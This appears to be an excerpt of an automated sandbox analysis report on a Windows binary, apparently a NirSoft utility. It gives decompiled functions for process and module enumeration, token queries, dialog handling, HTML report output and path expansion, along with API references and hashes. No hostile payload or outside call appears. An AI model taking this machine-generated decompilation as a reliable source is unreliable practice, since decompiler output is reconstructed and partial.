                                                                                                                0x00409c34
                                                                                                                0x00000000
                                                                                                                0x00409c2f
                                                                                                                0x00409bf7
                                                                                                                0x00409bfb
                                                                                                                0x00409c02
                                                                                                                0x00409c06
                                                                                                                0x00409c0d
                                                                                                                0x00409c14
                                                                                                                0x00409c17
                                                                                                                0x00409c18
                                                                                                                0x00409c1b
                                                                                                                0x00409c1e
                                                                                                                0x00000000
                                                                                                                0x00409c1e
                                                                                                                0x00409b1f
                                                                                                                0x00409b25
                                                                                                                0x00409b2a
                                                                                                                0x00409b2d
                                                                                                                0x00409b33
                                                                                                                0x00409b3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b4b
                                                                                                                0x00409b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b6a
                                                                                                                0x00409b6c
                                                                                                                0x00409b6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b77
                                                                                                                0x00409b7b
                                                                                                                0x00409b82
                                                                                                                0x00409b86
                                                                                                                0x00409b8d
                                                                                                                0x00409b8e
                                                                                                                0x00409b94
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                0x00409179
                                                                                                                0x00409209
                                                                                                                0x00409209
                                                                                                                0x00409185
                                                                                                                0x0040918a
                                                                                                                0x0040918f
                                                                                                                0x00409208
                                                                                                                0x00000000
                                                                                                                0x00409191
                                                                                                                0x0040919e
                                                                                                                0x004091a2
                                                                                                                0x004091a7
                                                                                                                0x004091af
                                                                                                                0x004091b3
                                                                                                                0x004091b8
                                                                                                                0x004091c0
                                                                                                                0x004091c4
                                                                                                                0x004091c9
                                                                                                                0x004091d1
                                                                                                                0x004091d5
                                                                                                                0x004091da
                                                                                                                0x004091e2
                                                                                                                0x004091e6
                                                                                                                0x004091eb
                                                                                                                0x004091ed
                                                                                                                0x004091ed
                                                                                                                0x004091eb
                                                                                                                0x004091da
                                                                                                                0x004091c9
                                                                                                                0x004091b8
                                                                                                                0x004091ff
                                                                                                                0x00409202
                                                                                                                0x00409202
                                                                                                                0x00000000
                                                                                                                0x004091ff

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                0x004090f5
                                                                                                                0x00409171
                                                                                                                0x00409171
                                                                                                                0x004090fd
                                                                                                                0x00409103
                                                                                                                0x00409107
                                                                                                                0x00409170
                                                                                                                0x00000000
                                                                                                                0x00409170
                                                                                                                0x00409116
                                                                                                                0x0040911a
                                                                                                                0x0040911f
                                                                                                                0x00409127
                                                                                                                0x0040912b
                                                                                                                0x00409130
                                                                                                                0x00409138
                                                                                                                0x0040913c
                                                                                                                0x00409141
                                                                                                                0x00409149
                                                                                                                0x0040914d
                                                                                                                0x00409152
                                                                                                                0x0040915a
                                                                                                                0x0040915e
                                                                                                                0x00409163
                                                                                                                0x00409165
                                                                                                                0x00409165
                                                                                                                0x00409163
                                                                                                                0x00409152
                                                                                                                0x00409141
                                                                                                                0x00409130
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                0x00409faf
                                                                                                                0x00409fb4
                                                                                                                0x00409fb5
                                                                                                                0x00409fb6
                                                                                                                0x0040a043
                                                                                                                0x0040a04a
                                                                                                                0x0040a058
                                                                                                                0x0040a05f
                                                                                                                0x0040a06d
                                                                                                                0x0040a074
                                                                                                                0x0040a08e
                                                                                                                0x0040a099
                                                                                                                0x0040a0ab
                                                                                                                0x0040a0c9
                                                                                                                0x0040a0ce
                                                                                                                0x00000000
                                                                                                                0x0040a0ce
                                                                                                                0x00409fc3
                                                                                                                0x00409fca
                                                                                                                0x00409fd8
                                                                                                                0x00409fdf
                                                                                                                0x00409ff9
                                                                                                                0x0040a006
                                                                                                                0x0040a018
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                0x00406216
                                                                                                                0x0040621b
                                                                                                                0x00406222
                                                                                                                0x0040625f
                                                                                                                0x00406263
                                                                                                                0x00406269
                                                                                                                0x00406271
                                                                                                                0x00406273
                                                                                                                0x00406289
                                                                                                                0x00406289
                                                                                                                0x0040628e
                                                                                                                0x0040628f
                                                                                                                0x004062a9
                                                                                                                0x004062ab
                                                                                                                0x004062ad
                                                                                                                0x004062b0
                                                                                                                0x004062c3
                                                                                                                0x004062c3
                                                                                                                0x004062d3
                                                                                                                0x004062da
                                                                                                                0x004062f1
                                                                                                                0x004062f7
                                                                                                                0x004062fe
                                                                                                                0x0040630d
                                                                                                                0x00406312
                                                                                                                0x0040631e
                                                                                                                0x00406327
                                                                                                                0x00406275
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406285
                                                                                                                0x00406287
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406277
                                                                                                                0x0040627a
                                                                                                                0x00406280
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x0040627a
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406273
                                                                                                                0x00406224
                                                                                                                0x00406224
                                                                                                                0x00406229
                                                                                                                0x0040622a
                                                                                                                0x0040622f
                                                                                                                0x00406236
                                                                                                                0x0040623c
                                                                                                                0x00406243
                                                                                                                0x00406245
                                                                                                                0x00406247
                                                                                                                0x00406248
                                                                                                                0x0040624b
                                                                                                                0x00406254
                                                                                                                0x00406254
                                                                                                                0x0040632d
                                                                                                                0x00406334

                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                0x004081e4
                                                                                                                0x004081ec
                                                                                                                0x004081fc
                                                                                                                0x00408200
                                                                                                                0x00408215
                                                                                                                0x0040821c
                                                                                                                0x0040822a
                                                                                                                0x00408231
                                                                                                                0x0040823f
                                                                                                                0x00408246
                                                                                                                0x0040824b
                                                                                                                0x0040824e
                                                                                                                0x0040825a
                                                                                                                0x0040825c
                                                                                                                0x00408261
                                                                                                                0x0040826c
                                                                                                                0x0040826d
                                                                                                                0x0040826e
                                                                                                                0x00408273
                                                                                                                0x00408273
                                                                                                                0x00408276
                                                                                                                0x0040827c
                                                                                                                0x0040828a
                                                                                                                0x00408290
                                                                                                                0x004082ab
                                                                                                                0x004082c5
                                                                                                                0x004082c6
                                                                                                                0x004082d1
                                                                                                                0x004082d2
                                                                                                                0x004082d3
                                                                                                                0x004082e7
                                                                                                                0x004082ec
                                                                                                                0x004082f0
                                                                                                                0x00000000
                                                                                                                0x004082f5
                                                                                                                0x004082fe

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                0x0040920a
                                                                                                                0x00409218
                                                                                                                0x00409223
                                                                                                                0x0040922c
                                                                                                                0x0040924b
                                                                                                                0x00409253
                                                                                                                0x0040929b
                                                                                                                0x004092e4
                                                                                                                0x0040929d
                                                                                                                0x004092a3
                                                                                                                0x004092b1
                                                                                                                0x004092bd
                                                                                                                0x004092cc
                                                                                                                0x004092d1
                                                                                                                0x004092d8
                                                                                                                0x004092dd
                                                                                                                0x00409255
                                                                                                                0x0040925b
                                                                                                                0x00409269
                                                                                                                0x00409275
                                                                                                                0x00409282
                                                                                                                0x0040928d
                                                                                                                0x00409292
                                                                                                                0x004092ec
                                                                                                                0x004092ef
                                                                                                                0x004092ef
                                                                                                                0x00409231
                                                                                                                0x00409232
                                                                                                                0x00409233
                                                                                                                0x00000000
                                                                                                                0x00409239
                                                                                                                0x0040921a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
